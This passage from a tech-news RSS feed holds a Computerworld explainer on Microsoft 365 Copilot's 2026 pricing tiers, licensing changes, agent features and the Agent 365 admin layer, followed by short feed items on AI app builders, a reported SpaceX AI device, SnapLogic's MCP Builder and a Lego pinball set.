					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Initially launched in November 2023, Microsoft 365 Copilot brings a range of generative AI (genAI) features to Microsoft Office productivity apps, such as Word, Outlook, Teams, and Excel. With capabilities ranging from quick meeting summaries to in-depth data analysis, it’s available via a paid add-on license for <a href="https://www.computerworld.com/article/1691110/microsoft-365-explained.html">Microsoft 365</a> enterprise and small-business customers.</p>



<p>Initially hampered by <a href="https://www.computerworld.com/article/2513395/copilot-for-microsoft-365-review-hands-on-deep-dive.html">underwhelming capabilities</a> and a hefty price tag for businesses of all sizes, M365 Copilot has slowly gained traction in business as its abilities have increased and the integrations between Copilot and various M365 apps and services have improved. With numerous feature rollouts over the past three years, Microsoft has gradually repositioned M365 Copilot from a simple chatbot to a collection of autonomous agents that can carry out tasks across the M365 ecosystem.</p>



<p>The company has also goosed adoption by introducing a <a href="https://www.computerworld.com/article/4093224/microsoft-drops-m365-copilot-price-for-smbs-upgrades-free-copilot-chat.html">more affordable pricing tier for small businesses</a> and (temporarily, as it turns out) allowing commercial users with a standard M365 license to <a href="https://www.computerworld.com/article/4058429/copilot-chat-comes-to-m365-apps-for-no-extra-cost.html">use Copilot in the Office apps</a>, even without the add-on M365 Copilot license.</p>



<h3 class="wp-block-heading">Microsoft 365 Copilot pricing: 2026 tiers</h3>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table><tbody><tr><td><strong>Tier</strong></td><td><strong>Monthly cost (paid annually)</strong></td><td><strong>Availability</strong></td></tr><tr><td><a href="https://www.microsoft.com/en-us/microsoft-365-copilot/pricing/enterprise" target="_blank" rel="noreferrer noopener">M365 Copilot</a></td><td>$30 / user</td><td>For organizations with more than 300 seats; required for in-app Copilot integration in organizations with more than 2,000 seats</td></tr><tr><td><a href="https://www.microsoft.com/en-us/microsoft-365-copilot/pricing" target="_blank" rel="noreferrer noopener">M365 Copilot Business</a></td><td>$21 / user</td><td>For organizations with 10 – 300 seats</td></tr><tr><td><a href="https://www.microsoft.com/en-us/microsoft-agent-365#plans-and-pricing" target="_blank" rel="noreferrer noopener">Agent 365</a> (add-on management layer)</td><td>$15 / user</td><td>Available as standalone subscription or included in the new M365 E7 Frontier Suite</td></tr></tbody></table> </div></figure>



<h2 class="wp-block-heading">Microsoft 365 Copilot today</h2>



<p>In this way, Microsoft 365 Copilot has moved from genAI curiosity to a key part of many enterprises’ workflows. In January 2026, Microsoft said it had <a href="https://www.computerworld.com/article/4124591/microsoft-touts-m365-copilot-momentum-claims-15m-paid-users.html">15 million paid M365 Copilot seats</a>, a figure the company <a href="https://techcrunch.com/2026/04/29/microsoft-says-it-has-over-20m-paid-copilot-users-and-they-really-are-using-it/" target="_blank" rel="noreferrer noopener">raised to 20 million</a> in April.</p>



<p>However, its momentum now faces a challenge as <a href="https://www.computerworld.com/article/4150022/microsoft-backtracks-on-copilot-chat-access-in-m365-apps.html">Microsoft limits access to Copilot Chat</a>, a freemium version of the paid M365 Copilot, for its largest enterprise customers. </p>



<p>Specifically, for commercial customers with more than 2,000 seats, Microsoft has removed in-app Copilot Chat access from Word, Excel, and PowerPoint for users without a Microsoft 365 Copilot license. To maintain that integration, large organizations must now pay for the full $30/user/month M365 Copilot license. The M365 Copilot license includes what Microsoft calls priority access to Copilot capabilities, which provides “faster response times and more consistent availability compared to standard access,” according the the company. </p>



<p>Smaller firms (less than 2,000 seats) that have a Microsoft 365 license but not the add-on M365 Copilot license will maintain standard access to Copilot from within the Office apps. <a href="https://support.microsoft.com/en-gb/topic/standard-versus-priority-access-to-features-in-microsoft-365-copilot-chat-12c8d9f8-db32-4f99-8ebe-d8d85879137f">Microsoft warns</a> that standard users may experience longer response times and temporary feature limitations as the service shifts resources to its higher-tier customers during peak hours.</p>



<p>When signed in to the <a href="https://m365.cloud.microsoft/" target="_blank" rel="noreferrer noopener">Copilot Chat hub</a>, users can see which version of Copilot they have by looking for one of the following labels at the bottom of the left sidebar:</p>



<ul class="wp-block-list">
<li><strong>Copilot Chat (Basic)</strong> means the user doesn’t have an M365 Copilot license and can’t use Copilot in the Office apps. They can use the standalone Copilot Chat app with standard access.</li>



<li><strong>M365 Copilot (Basic)</strong> means the user doesn’t have an M365 Copilot license but does have standard access to Copilot in the Office apps.</li>



<li><strong>M365 Copilot (Premium)</strong> means the user has an M365 Copilot license and has priority access to Copilot in the Office apps.</li>
</ul>



<p>Users with paid M365 Copilot licenses also get advanced features including the ability to pull in data from across the M365 environment (documents, meetings, emails, chats, etc.), extensive use of agents including “advanced” agents like Researcher and Analyst, and the ability to create custom agents. See Microsoft’s “<a href="https://support.microsoft.com/en-us/microsoft-365-copilot/how-copilot-chat-works-with-and-without-a-microsoft-365-copilot-license" target="_blank" rel="noreferrer noopener">How Copilot Chat works with and without a Microsoft 365 Copilot license</a>” page for details.</p>



<aside class="sidebar">
<h3><strong>What’s new with Microsoft 365 Copilot</strong></h3>
&gt;
<li> <strong>Licensing shift:</strong> Large enterprises (more than 2,000 seats) cannot access Copilot directly in Office apps without the M365 Copilot license.</li>
<li><strong>Multimodel access:</strong> M365 Copilot now supports non-OpenAI models like Anthropic’s Claude 4, allowing users to choose the best logic for specific tasks.</li>
<li><strong>Agentic pivot:</strong> The focus shifts from simple chat to autonomous agents that execute multi-step workflows across the M365 ecosystem.</li>

</aside>




<h2 class="wp-block-heading">What other Copilots does Microsoft offer?</h2>



<p>It’s worth noting that Microsoft uses the term “Copilot” for a wide variety of genAI tools and functions. Individual users with M365 Personal, Family, and Premium subscriptions <a href="https://www.computerworld.com/article/3806855/copilot-ai-microsoft-365.html">can use Copilot in Office apps</a>, but with fewer features and privileges than business users get with a Microsoft 365 Copilot license. There’s also a <a href="https://www.computerworld.com/article/1611598/microsoft-copilot-tips-how-to-use-copilot-right.html">free consumer version of Copilot</a> with very limited functionality. </p>



<p>Adding to the confusion, the company offers several specialized enterprise versions of Copilot for specific purposes, including <a href="https://learn.microsoft.com/en-us/microsoft-copilot-studio/" target="_blank" rel="noreferrer noopener">Microsoft Copilot Studio</a>, <a href="https://learn.microsoft.com/en-us/copilot/security/" target="_blank" rel="noreferrer noopener">Microsoft Security Copilot</a>, <a href="https://learn.microsoft.com/en-us/azure/copilot/" target="_blank" rel="noreferrer noopener">Azure Copilot</a>, and <a href="https://www.infoworld.com/article/3609013/github-copilot-everything-you-need-to-know.html" target="_blank">GitHub Copilot</a>, as well as additional Copilot “experiences” for Microsoft products such as <a href="https://learn.microsoft.com/en-us/dynamics365/copilot/ai-get-started" target="_blank" rel="noreferrer noopener">Dynamics 365</a>, <a href="https://learn.microsoft.com/en-us/power-platform/copilot" target="_blank" rel="noreferrer noopener">Power Platform</a>, and <a href="https://learn.microsoft.com/en-us/fabric/fundamentals/copilot-fabric-overview" target="_blank" rel="noreferrer noopener">Microsoft Fabric</a>. </p>



<p>Also available: agents in M365 Copilot built for specific industries, including <a href="https://learn.microsoft.com/en-us/copilot/finance/" target="_blank" rel="noreferrer noopener">finance</a>, <a href="https://learn.microsoft.com/en-us/microsoft-sales-copilot/" target="_blank" rel="noreferrer noopener">sales</a>, and <a href="https://learn.microsoft.com/en-us/microsoft-copilot-service/" target="_blank" rel="noreferrer noopener">service</a>.</p>



<h2 class="wp-block-heading">From chatbot to multi-model researcher to agentic powerhouse</h2>



<p>Microsoft has moved away from a single-model approach for its AI assistant. Copilot Chat has evolved into a Frontier interface, allowing users to select among different LLMs (large language models) such as GPT-5.4 and Anthropic Claude 4 for specialized tasks.</p>



<p>A persistent AI risk for enterprises is overly permissive data access. Because Copilot inherits the permissions of the user, any file that is improperly shared within an organization can be surfaced by the AI. To combat the issue of business-critical files that are at risk due to inappropriate classification, <a href="https://learn.microsoft.com/en-us/purview/copilot-in-purview-overview" target="_blank" rel="noreferrer noopener">Microsoft has integrated Purview Data Security Posture Management (DSPM)</a> more deeply into Copilot, alerting users when they are generating content from unclassified or sensitive sources.</p>



<p>Other recently introduced M365 Copilot features include:</p>



<ul class="wp-block-list">
<li><a href="https://support.microsoft.com/en-us/topic/get-started-with-researcher-in-microsoft-365-copilot-e63ab760-f3de-4c47-ae87-dad601b0e9c4" target="_blank" rel="noreferrer noopener">Copilot Researcher</a><strong>:</strong> This feature allows the assistant to pull from multi-model intelligence, comparing perspectives from different AI models side-by-side to reduce hallucinations.</li>



<li><a href="https://support.microsoft.com/en-us/topic/get-started-with-microsoft-365-copilot-notebooks-0775e693-11c6-4d80-8aba-fcc81a737a06" target="_blank" rel="noreferrer noopener">Copilot Notebooks</a><strong>:</strong> Notebooks allow you to ground the AI in specific project context. These can now be exported directly into structured Excel spreadsheets or PowerPoint decks, bypassing the need for manual copy and pasting.</li>



<li><a href="https://support.microsoft.com/en-us/office/interpreter-in-microsoft-teams-meetings-and-calls-c7efe2bb-535d-42ab-a5c4-d2d91619b46d" target="_blank" rel="noreferrer noopener">Teams Interpreter</a><strong>:</strong> Integrated directly into Teams Phone, Interpreter is designed to provide real-time, AI-powered language interpretation during live calls, a boon for global enterprise operations.</li>



<li><a href="https://www.computerworld.com/article/4080435/m365-copilot-now-lets-you-build-apps-and-agents-with-natural-language-prompts.html">App Builder</a>: A no-code tool that lets business users create apps, workflows, and agents using natural language prompts. It’s essentially a “lite” version of Microsoft’s high-end Copilot Studio environment for developers.</li>



<li><a href="https://www.computerworld.com/article/4163305/agent-mode-is-now-available-in-microsoft-word-excel-and-powerpoint.html">Agents for Word, Excel, and PowerPoint</a>: Advanced modes that allow Copilot to take direct action on documents and files rather than simply suggest changes. </li>
</ul>



<p>Even more notable was the June <a href="https://www.computerworld.com/article/4186190/microsoft-launches-copilot-cowork-with-usage-based-pricing.html">launch of Copilot Cowork</a>, which Microsoft pitches as an AI agent for M365 Copilot that can independently perform long-running, multi-step tasks, even when a user’s computer is turned off. Unlike Anthropic’s Claude Cowork, which can interact directly with files and applications on a user’s computer, Copilot Cowork runs in Microsoft’s cloud environment and acts on documents held in a customer’s Microsoft 365 tenant. Copilot Cowork requires a Microsoft 365 Copilot license and is billed based on usage.</p>



<p>Another announcement that caused a stir was Microsoft’s unveiling of Scout, its first <a href="https://www.computerworld.com/article/4180103/microsoft-unveils-scout-an-autonomous-ai-agent-built-on-openclaw.html">autonomous agent built on the open-source OpenClaw platform</a>. By integrating OpenClaw-style agentic capabilities, Microsoft hopes to transform Copilot into an always-on system that can, for instance, scan Outlook email inboxes and calendars to suggest daily priorities. Microsoft’s implementation addresses security concerns around self-hosted agents by isolating professional-grade “autopilots” within specific roles and applying managed permission guardrails. Scout is available as an “experimental release” to customers of Microsoft’s Frontier program.</p>



<p>Industry analysts note that these tools are new and unproven, and IT leaders should use caution when testing them and evaluating costs.</p>



<h2 class="wp-block-heading">Managing AI agent sprawl: Enter Agent 365</h2>



<p>As organizations move beyond simple chat to building custom <a href="https://learn.microsoft.com/en-us/microsoft-365/copilot/extensibility/overview-declarative-agent" target="_blank" rel="noreferrer noopener">declarative agents</a> in Copilot Studio, the risk of <a href="https://www.cio.com/article/4129630/shadow-ai-practices-a-wakeup-call-for-enterprises.html" target="_blank">shadow AI </a>has become a concern. Gartner reports that 86% of IT leaders require additional governance to manage these agents.</p>



<p>Available as an add-on subscription for Microsoft 365 or bundled in the top-end M365 E7 package, <a href="https://www.computerworld.com/article/4092436/microsoft-unveils-agent-365-to-help-it-manage-ai-agent-sprawl.html">Agent 365</a> acts as a control plane for the AI ecosystem. Unlike the user-facing Copilot, Agent 365 is a back-end dashboard that allows IT admins to manage agents in various ways:</p>



<ol start="1" class="wp-block-list">
<li><strong>Registry and lifecycle management:</strong> View every agent — Microsoft, third-party, or internally developed — in a “single-pane-of-glass” dashboard.</li>



<li><strong>Policy-based guardrails:</strong> Admins can set global rules to prevent agents from accessing high-sensitivity data (like payroll), even if the human user has permission.</li>



<li><strong>Unified ROI analytics:</strong> Leaders can track which agents are actually driving value, allowing for precise seat-count adjustments during renewal cycles.<br><br></li>
</ol>



<h3 class="wp-block-heading">Microsoft Agent 365 quick facts</h3>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table><tbody><tr><td>Pricing</td><td>$15 / user / month (as an add-on) or included in the Microsoft 365 E7 suite ($99 / user / month)</td></tr><tr><td>Core functions</td><td>Centralized registry, access control, and performance analytics for all AI agents</td></tr><tr><td>Objective</td><td>Designed to prevent agent sprawl and ensure agents from partners (e.g., Adobe, ServiceNow, etc.) follow M365 security rules</td></tr></tbody></table> </div></figure>



<p>Gartner says that Agent 365 is still a work in progress and has yet to prove it can actually reduce costs in IT operations. The analyst firm advises customers to assess Agent 365 but not necessarily move to it or the E7 bundle right away.</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<h2 class="wp-block-heading">Copilot vs. AI in other productivity apps</h2>



<p>Most vendors in the productivity and collaboration software market have added genAI and agentic tools to their offerings at this point.</p>



<p>The rivalry between Microsoft and Google has heightened in 2026. While Google has <a href="https://www.computerworld.com/article/4136922/google-gemini-3-years.html#:~:text=Gemini%E2%80%99s%20simplest%20struggles">faced criticism</a> for a messy transition from the Google Assistant to Gemini, it remains a price leader by <a href="https://www.computerworld.com/article/3804055/google-ups-workspace-price-makes-gemini-ai-features-available-for-free.html">embedding Gemini features directly</a> into most tiers of its office suite, <a href="https://www.computerworld.com/article/3570821/google-workspace-explained-googles-answer-to-microsoft-365.html">Google Workspace</a>.</p>



<p>In contrast, Microsoft seems to be threading a needle, tightening Copilot Premium licensing for large enterprises while making basic Copilot features available to smaller customers without an add-on license. The goal may be to standardize AI as a commodity while reserving the high-value agentic features for the highest-paying enterprise customers.</p>



<p>While Microsoft focuses on the productivity suite, Salesforce is positioning Slack as the “agentic operating system” for the enterprise. As of April 2026, <a href="https://www.computerworld.com/article/4153622/slacks-ai-updates-signal-shift-towards-agent-orchestration.html">Slack AI has moved beyond summarizing to orchestrating agentic workflows</a>. This is designed let you trigger complex, multi-step actions across non-Microsoft systems directly from a Slack thread.</p>



<p>Salesforce’s Agentforce platform uses the Atlas Reasoning Engine, which is designed to offer autonomous front-office automation (sales, service, and marketing). For organizations where CRM data is more critical than Word documents, Agentforce is emerging as a formidable, high-ROI alternative to Copilot.</p>



<aside class="sidebar">
<h3><strong>Gartner’s 5 stages of agentic AI evolution</strong></h3>
&gt; Gartner projects that agentic AI could drive approximately 30% of enterprise application software revenue by 2035. The analyst firm’s roadmap  identifies five maturity stages for IT leaders: 

&gt;
<li><strong>2025: AI assistants:</strong> Embedded helpers that simplify tasks but remain dependent on human input</li>
<li><strong>2026: Task-specific agents:</strong> Agents capable of end-to-end complex tasks, such as real-time cybersecurity-threat response</li>
<li><strong>2027: Collaborative agents:</strong> Multi-agent systems that work together across data environments to solve multifaceted business problems</li>
<li><strong>2028: Agentic front ends:</strong> A shift where a third of user experiences move away from native apps toward “agentic interfaces” that navigate multiple apps on behalf of the user</li>
<li><strong>2029: Democratized ecosystems:</strong> A new normal where 50% of knowledge workers actively govern or create agents on demand for complex tasks</li>

</aside>




<p>In March 2026, <a href="https://www.computerworld.com/article/4149464/apple-goes-global-with-key-mdm-tools-and-services-for-business.html">Apple launched Apple Business</a>, a platform designed to integrate Apple Intelligence directly into macOS and iOS. Apple claims its competitive edge is its on-screen awareness. Unlike cloud-heavy competitors, Apple Intelligence is built to act across apps locally, appealing to regulated industries concerned about data leakage.</p>



<p>Apple Business now supports automated Managed Apple Accounts via integration with Microsoft Entra ID, a feature designed to let IT teams manage Apple’s AI features using their Microsoft identity stack.</p>



<p>As Microsoft tightens the reins on free access, the question for enterprise IT leaders is no longer whether Copilot can summarize a meeting, but whether the $30-per-month leap delivers enough agentic automation to justify the cost. For many, the answer will lie in the effectiveness of Agent 365 in bringing order to the burgeoning fleet of AI workers.</p>



<p><em>This article was originally published in February 2025 and most recently updated in July 2026.</em></p>



<h3 class="wp-block-heading">More on Microsoft 365 Copilot:</h3>



<ul class="wp-block-list">
<li><a href="https://www.computerworld.com/article/4036013/how-it-leaders-unlock-productivity-with-microsoft-365-copilot.html">How IT leaders unlock productivity with Microsoft 365 Copilot</a></li>



<li><a href="https://www.computerworld.com/article/4110646/building-end-to-end-workflows-with-microsoft-365-copilot.html">Building end-to-end workflows with Microsoft 365 Copilot</a></li>



<li><a href="https://www.computerworld.com/article/3479705/how-to-use-microsoft-copilot-for-writing-in-microsoft-365-word-outlook-onenote.html">Microsoft Copilot can boost your writing in Word, Outlook, and OneNote — here’s how</a></li>



<li><a href="https://www.computerworld.com/article/4119411/11-cool-things-copilot-can-do-in-excel.html">11 cool things Copilot can do in Excel</a></li>



<li><a href="https://www.computerworld.com/article/4022584/9-ways-copilot-can-turbocharge-onenote.html">9 ways Copilot can turbocharge OneNote</a></li>



<li><a href="https://www.computerworld.com/article/4067372/how-to-curb-hallucinations-in-copilot-and-other-genai-tools.html">How to curb hallucinations in Copilot (and other genAI tools)</a></li>
</ul>



<p></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[IONOS KI App & Site Builder vs. Lovable: Welches Tool passt besser?]]></title>
<description><![CDATA[IONOS KI App & Site Builder und Lovable erleichtern die Erstellung von Webanwendungen per natürlicher Sprache, setzen aber unterschiedliche Schwerpunkte. Der Vergleich zeigt, wie sich beide Tools bei Funktionsumfang, Hosting, Preismodell und Datenschutz unterscheiden und für welche Einsatzszenari...]]></description>
<link>https://tsecurity.de/de/3640893/server/ionos-ki-app-site-builder-vs-lovable-welches-tool-passt-besser/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640893/server/ionos-ki-app-site-builder-vs-lovable-welches-tool-passt-besser/</guid>
<pubDate>Thu, 02 Jul 2026 13:15:28 +0200</pubDate>
<category>🐧 Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://www.ionos.de/digitalguide/fileadmin/DigitalGuide/Teaser/ki_app_builder_vs_lovable_1200x640.png" width="1200" height="640" alt=""><br>IONOS KI App &amp; Site Builder und Lovable erleichtern die Erstellung von Webanwendungen per natürlicher Sprache, setzen aber unterschiedliche Schwerpunkte. Der Vergleich zeigt, wie sich beide Tools bei Funktionsumfang, Hosting, Preismodell und Datenschutz unterscheiden und für welche Einsatzszenarien sich welche Lösung besser eignet.]]></content:encoded>
</item>
<item>
<title><![CDATA[Web-App erstellen: Coden, No Code oder AI App Builder?]]></title>
<description><![CDATA[Eine Web-App lässt sich heute auf mehreren Wegen umsetzen: klassisch programmiert, mit No Code oder Low Code oder KI-gestützt per AI App Builder. Welche Methode am besten passt, hängt von Funktionsumfang, Know-how, Budget, Hosting und Datenschutz ab. Besonders AI App Builder eröffnen einen modern...]]></description>
<link>https://tsecurity.de/de/3640585/server/web-app-erstellen-coden-no-code-oder-ai-app-builder/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640585/server/web-app-erstellen-coden-no-code-oder-ai-app-builder/</guid>
<pubDate>Thu, 02 Jul 2026 11:00:28 +0200</pubDate>
<category>🐧 Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://www.ionos.de/digitalguide/fileadmin/DigitalGuide/Teaser/web-app-erstellen_t.png" width="2752" height="1536" alt=""><br>Eine Web-App lässt sich heute auf mehreren Wegen umsetzen: klassisch programmiert, mit No Code oder Low Code oder KI-gestützt per AI App Builder. Welche Methode am besten passt, hängt von Funktionsumfang, Know-how, Budget, Hosting und Datenschutz ab. Besonders AI App Builder eröffnen einen modernen Einstieg in die Web-App-Entwicklung.]]></content:encoded>
</item>
<item>
<title><![CDATA[SpaceX Reportedly Has an AI Device Prototype]]></title>
<description><![CDATA[According to the Wall Street Journal, SpaceX showed investors an early prototype of a slim, "handset-like" AI device running a proprietary operating system and integrating xAI technology. Elon Musk, however, denied the report, calling it "utterly false." TechCrunch reports: SpaceX, alongside sist...]]></description>
<link>https://tsecurity.de/de/3640403/it-security-nachrichten/spacex-reportedly-has-an-ai-device-prototype/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640403/it-security-nachrichten/spacex-reportedly-has-an-ai-device-prototype/</guid>
<pubDate>Thu, 02 Jul 2026 09:23:01 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[According to the Wall Street Journal, SpaceX showed investors an early prototype of a slim, "handset-like" AI device running a proprietary operating system and integrating xAI technology. Elon Musk, however, denied the report, calling it "utterly false." TechCrunch reports: SpaceX, alongside sister company Tesla, does have the manufacturing expertise to pull off mass-producing a bunch of AI devices -- not to mention access to the chips needed to power any on-device compute. SpaceX has also signaled that it's keen to expand into wireless, with Starlink Mobile as a potential competitor to Verizon and AT&amp;T. One analyst even went as far as to speculate that T-Mobile or AT&amp;T would make fine acquisition targets for the rocket builder, though such a purchase would, undoubtedly, be pricey.
 
It's also not clear if SpaceX is just throwing spaghetti at the wall or if it will attempt to really mass-produce and market such a device. But one thing that seems clearer is that if OpenAI is doing it, Musk would, perhaps, want to try to do it better. [...]
 
Like OpenAI, SpaceX's prototype is reportedly designed to run on a proprietary operating system and integrate technology from xAI, Musk's AI company that SpaceX acquired earlier this year. This would prevent these new devices from being trapped inside another company's platforms (like Google's Android). But the intent also appears to be to create something new, with native AI interfaces. That said, the graveyard is crowded with the unsuccessful launches of AI devices from companies like Humane and Rabbit. A company wanting to sell an AI device does not equate to consumers wanting to buy such a thing. Yet.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=SpaceX+Reportedly+Has+an+AI+Device+Prototype%3A+https%3A%2F%2Fhardware.slashdot.org%2Fstory%2F26%2F07%2F02%2F0217230%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fhardware.slashdot.org%2Fstory%2F26%2F07%2F02%2F0217230%2Fspacex-reportedly-has-an-ai-device-prototype%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://hardware.slashdot.org/story/26/07/02/0217230/spacex-reportedly-has-an-ai-device-prototype?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[SnapLogic MCP Builder eases creation of MCP servers]]></title>
<description><![CDATA[SnapLogic has released MCP Builder, a template-based tool designed to help organizations operationalize AI faster by turning existing integration pipelines into agent-ready Model Context Protocol (MCP) servers.



Announced July 1 and generally available in the MCP Server workflow of the SnapLogi...]]></description>
<link>https://tsecurity.de/de/3639896/ai-nachrichten/snaplogic-mcp-builder-eases-creation-of-mcp-servers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639896/ai-nachrichten/snaplogic-mcp-builder-eases-creation-of-mcp-servers/</guid>
<pubDate>Thu, 02 Jul 2026 01:18:41 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>SnapLogic has released MCP Builder, a template-based tool designed to help organizations operationalize AI faster by turning existing integration pipelines into agent-ready <a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html" data-type="link" data-id="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">Model Context Protocol</a> (MCP) servers.</p>



<p>Announced July 1 and generally available in the <a href="https://www.snaplogic.com/products/mcp">MCP Server</a> workflow of the SnapLogic platform, MCP Builder generates MCP servers from existing integrations, OpenAPI specifications, and API management services, SnapLogic said. Organizations can publish MCP tools without rebuilding workflows, writing code, or manually constructing MCP implementations, resulting in faster deployment and greater consistency, according to the company. </p>



<p>SnapLogic said MCP Builder makes it easier to create MCP Servers, connecting AI agents to trusted enterprise systems and workflows. Unlike DIY MCP approaches, SnapLogic accelerates MCP adoption by turning existing deterministic pipelines into governed MCP tools through a one-step creation experience, while providing enterprise connectivity, identity propagation, observability, and life-cycle governance through the unified SnapLogic Agentic Integration Platform.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Was ist ein AI App Builder?]]></title>
<description><![CDATA[AI App Builder ermöglichen es, Anwendungen mithilfe künstlicher Intelligenz deutlich schneller zu erstellen als mit klassischen Entwicklungsansätzen. Statt Code manuell zu schreiben, beschreiben Nutzende ihre Anforderungen in natürlicher Sprache und die KI übernimmt große Teile der App-Entwicklun...]]></description>
<link>https://tsecurity.de/de/3638233/server/was-ist-ein-ai-app-builder/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638233/server/was-ist-ein-ai-app-builder/</guid>
<pubDate>Wed, 01 Jul 2026 13:15:38 +0200</pubDate>
<category>🐧 Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://www.ionos.de/digitalguide/fileadmin/DigitalGuide/Teaser/cgi-skripte-auf--apache-aktivieren.jpg" width="1200" height="630" alt=""><br>AI App Builder ermöglichen es, Anwendungen mithilfe künstlicher Intelligenz deutlich schneller zu erstellen als mit klassischen Entwicklungsansätzen. Statt Code manuell zu schreiben, beschreiben Nutzende ihre Anforderungen in natürlicher Sprache und die KI übernimmt große Teile der App-Entwicklung. Unser Artikel erklärt die Grundlagen, typische Einsatzbereiche sowie Chancen und Grenzen von AI App Buildern.]]></content:encoded>
</item>
<item>
<title><![CDATA[No Code App Builder: Apps ohne Programmierkenntnisse erstellen]]></title>
<description><![CDATA["Ein No Code App Builder macht App-Entwicklung auch ohne eigenes Entwicklerteam zugänglich. Über visuelle Bausteine, Workflows und KI-Prompts entstehen Web-Apps, interne Tools oder erste Prototypen deutlich schneller als in klassischen Entwicklungsprojekten. Wichtig sind dabei nicht nur Bedienkom...]]></description>
<link>https://tsecurity.de/de/3638231/server/no-code-app-builder-apps-ohne-programmierkenntnisse-erstellen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638231/server/no-code-app-builder-apps-ohne-programmierkenntnisse-erstellen/</guid>
<pubDate>Wed, 01 Jul 2026 13:15:35 +0200</pubDate>
<category>🐧 Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://www.ionos.de/digitalguide/fileadmin/DigitalGuide/Teaser/access-alternatives-t.jpg" width="1200" height="630" alt=""><br>"Ein No Code App Builder macht App-Entwicklung auch ohne eigenes Entwicklerteam zugänglich. Über visuelle Bausteine, Workflows und KI-Prompts entstehen Web-Apps, interne Tools oder erste Prototypen deutlich schneller als in klassischen Entwicklungsprojekten. Wichtig sind dabei nicht nur Bedienkomfort und Tempo, sondern auch Datenmodell, Sicherheit, Skalierung und spätere Erweiterbarkeit."]]></content:encoded>
</item>
<item>
<title><![CDATA[Vibe-Coding-Tools: Die wichtigsten im Überblick]]></title>
<description><![CDATA[Vibe Coding verändert, wie digitale Produkte entstehen. Statt Code ausschließlich manuell zu schreiben, helfen KI-Tools dabei, Funktionen umzusetzen, Apps zu bauen oder Prototypen aus einfachen Prompts zu erstellen. Doch nicht jedes Tool passt zu jedem Use Case. Dieser Artikel erklärt die wichtig...]]></description>
<link>https://tsecurity.de/de/3638230/server/vibe-coding-tools-die-wichtigsten-im-ueberblick/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638230/server/vibe-coding-tools-die-wichtigsten-im-ueberblick/</guid>
<pubDate>Wed, 01 Jul 2026 13:15:34 +0200</pubDate>
<category>🐧 Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://www.ionos.de/digitalguide/fileadmin/DigitalGuide/Teaser/screenreader-t.jpg" width="1200" height="630" alt=""><br>Vibe Coding verändert, wie digitale Produkte entstehen. Statt Code ausschließlich manuell zu schreiben, helfen KI-Tools dabei, Funktionen umzusetzen, Apps zu bauen oder Prototypen aus einfachen Prompts zu erstellen. Doch nicht jedes Tool passt zu jedem Use Case. Dieser Artikel erklärt die wichtigsten Kategorien, stellt relevante Vibe-Coding-Tools vor und zeigt im AI-App-Builder-Vergleich, welches Werkzeug für welchen Zweck geeignet ist.]]></content:encoded>
</item>
<item>
<title><![CDATA[Lego verkauft jetzt voll funktionsfähigen Flipperautomaten – aber nicht an alle]]></title>
<description><![CDATA[Lego hat ab heute einen Flipperautomaten (auf Englisch: „Arcade Pinball Machine“) im Angebot. Dabei handelt es sich um ein neues Set (Nummer: 11374) aus der „Icons“-Reihe, das zum ersten Mal ein Lego-Modell in einen funktionierenden Flipper verwandelt.



Das Modell besteht aus 2.274 Teilen und i...]]></description>
<link>https://tsecurity.de/de/3637608/it-nachrichten/lego-verkauft-jetzt-voll-funktionsfaehigen-flipperautomaten-aber-nicht-an-alle/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637608/it-nachrichten/lego-verkauft-jetzt-voll-funktionsfaehigen-flipperautomaten-aber-nicht-an-alle/</guid>
<pubDate>Wed, 01 Jul 2026 08:32:25 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



